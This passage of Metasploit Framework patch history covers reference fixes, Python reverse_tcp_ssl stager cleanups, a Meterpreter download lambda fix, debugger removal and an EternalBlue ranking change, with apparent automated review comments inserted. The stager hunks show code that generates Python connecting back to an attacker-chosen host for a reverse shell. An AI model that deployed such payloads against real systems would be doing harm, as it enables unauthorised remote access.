@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ + ['CVE', '2014-5470'], ['EDB', '34450'], ['OSVDB', '110601'] ], From b932aae82ee623fa25e1c9d1f53b7a0eea156471 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 6 Jun 2017 11:50:07 -0500 Subject: [PATCH 32/38] reference typo fix --- modules/auxiliary/scanner/http/host_header_injection.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index 4f29c3e1d2..c17a0148cf 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2016-10073'], # validate, an instance of a described attack approach from the original reference + ['CVE', '2016-10073'], # validate, an instance of a described attack approach from the original reference ['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html'] ] )) From a953d94f6166a6449b7d3a6b3dec1b65161340ac Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 6 Jun 2017 19:07:55 -0400 Subject: [PATCH 33/38] Minor white space cleanups for PR #8340 --- lib/msf/core/payload/python/reverse_tcp_ssl.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index 6873728a86..02190d0df2 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb 
@@ -19,11 +19,9 @@ module Payload::Python::ReverseTcpSsl super register_advanced_options([ OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts',5]) + OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) ], self.class) end - - # # Generate the first stage @@ -59,8 +57,8 @@ module Payload::Python::ReverseTcpSsl cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "s=ssl.wrap_socket(so)\n" else - if opts[:retry_count]>0 - cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + if opts[:retry_count] > 0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" else cmd << "while 1:\n" end From 6131e4bd82fe852ff4889400d90ca5120ff2a151 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 7 Jun 2017 09:37:24 +1000 Subject: [PATCH 34/38] Fix download lambda function to take correct param count This is an emergency fix as a result of something being broken in master. This is also being pushed straight to master because github is down and the PR process isn't possible. This commit was reviewed by @wvu-r7 prior to being pushed. --- lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index afe82e1bac..5ec16f86fc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -328,7 +328,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO continue=false tries=false tries_no=0 - stat ||= lambda { } + stat ||= lambda { |a,b,c| } if opts continue = true if opts["continue"] From a052ee40649ce93ae22d0a05bda48b416df07ecf Mon Sep 17 00:00:00 2001 
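Review bot: `stat ||= lambda { |a,b,c| }` fixes the arity error, but a lambda enforces its arity strictly, so this default will raise ArgumentError again the moment any call site invokes `stat.call` with anything other than exactly three arguments. `stat ||= lambda { |*| }` (or `proc { }`) accepts any argument count and removes that class of regression outright, which is what a no-op default should do. The calls that invoke `stat` are outside this hunk, so I cannot confirm they all pass three arguments; the enclosing download method starts and ends outside the hunk.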
From: Spencer McIntyre Date: Tue, 6 Jun 2017 20:02:06 -0400 Subject: [PATCH 35/38] Use the opts hash not the datastore --- lib/msf/core/payload/python/reverse_tcp.rb | 2 +- lib/msf/core/payload/python/reverse_tcp_ssl.rb | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 4f67295246..c40f46ad28 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb @@ -32,7 +32,7 @@ module Payload::Python::ReverseTcp port: datastore['LPORT'], host: datastore['LHOST'], retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'], + retry_wait: datastore['StagerRetryWait'] } generate_reverse_tcp(conf) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index 02190d0df2..fa557b420f 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -31,7 +31,7 @@ module Payload::Python::ReverseTcpSsl port: datastore['LPORT'], host: datastore['LHOST'], retry_count: datastore['StagerRetryCount'], - retry_wait: datastore['StagerRetryWait'], + retry_wait: datastore['StagerRetryWait'] } generate_reverse_tcp_ssl(conf) @@ -51,7 +51,7 @@ module Payload::Python::ReverseTcpSsl def generate_reverse_tcp_ssl(opts={}) # Set up the socket - cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n" + cmd = "import ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n" if opts[:retry_wait].blank? # do not retry at all (old style) cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" From 596924552e00caaf48d64a54bb7f4691cb43c3dd Mon Sep 17 00:00:00 2001 
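Review bot: The `,time` import is now gated on `opts[:retry_wait].to_i > 0`, while the branch selection two lines below is gated on `opts[:retry_wait].blank?`; a `retry_wait` of `0` is not blank, so the generated stager takes the retry branch without having imported `time`, and if that branch emits a `time.sleep(...)` it dies with a NameError on the target. Gate both on the same predicate, e.g. `cmd = "import ssl,socket,struct#{opts[:retry_wait].blank? ? '' : ',time'}\n"`. The retry branch itself is outside this hunk, so whether it calls `time.sleep` is inferred; the default `StagerRetryWait` of 5 from the earlier hunk means the default path is unaffected.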
From: William Vu Date: Wed, 7 Jun 2017 03:19:30 -0500 Subject: [PATCH 36/38] Fix literal \n in jobs -i Regression from #4063. --- lib/msf/ui/console/command_dispatcher/jobs.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index 6ddb848068..cfb2d54bea 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -165,7 +165,7 @@ module Msf job = framework.jobs[job_id.to_s] mod = job.ctx[0] - output = '\n' + output = "\n" output += "Name: #{mod.name}" output += ", started at #{job.start_time}" if job.start_time print_line(output) From 4198efa41f1004cb206557a37d239a1ac6a1e23e Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 Jun 2017 00:17:42 -0500 Subject: [PATCH 37/38] Remove pry from CommandDispatcher::Creds... My bad. Should have been caught in #8517. --- lib/msf/ui/console/command_dispatcher/creds.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/creds.rb b/lib/msf/ui/console/command_dispatcher/creds.rb index b715afd55b..e0b94dd230 100644 --- a/lib/msf/ui/console/command_dispatcher/creds.rb +++ b/lib/msf/ui/console/command_dispatcher/creds.rb @@ -84,9 +84,6 @@ class Creds # TODO: this needs to be cleaned up to use the new syntax # def cmd_creds_help - require 'pry' - binding.pry - print_line print_line "With no sub-command, list credentials. If an address range is" print_line "given, show only credentials with logins on hosts within that" From a968a74ae0f98795112178b032c4cb326c60f889 Mon Sep 17 00:00:00 2001 From: "Stephen Shkardoon (ss23)" Date: Fri, 9 Jun 2017 10:56:12 +1200 Subject: [PATCH 38/38] Update ms17_010_eternalblue description and ranking. The module has been noted to cause crashes, reboots, BSOD, etc, on some systems. --- modules/exploits/windows/smb/ms17_010_eternalblue.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) 
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 310e6de498..a2960de1fe 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -8,7 +8,7 @@ require 'ruby_smb/smb1/packet' require 'windows_error' class MetasploitModule < Msf::Exploit::Remote - Rank = GoodRanking + Rank = AverageRanking include Msf::Exploit::Remote::Tcp @@ -32,6 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use those instead. + + On some systems, this module may cause system instability and crashes, such as a BSOD or + a reboot. This may be more likely with some payloads. }, 'Author' => [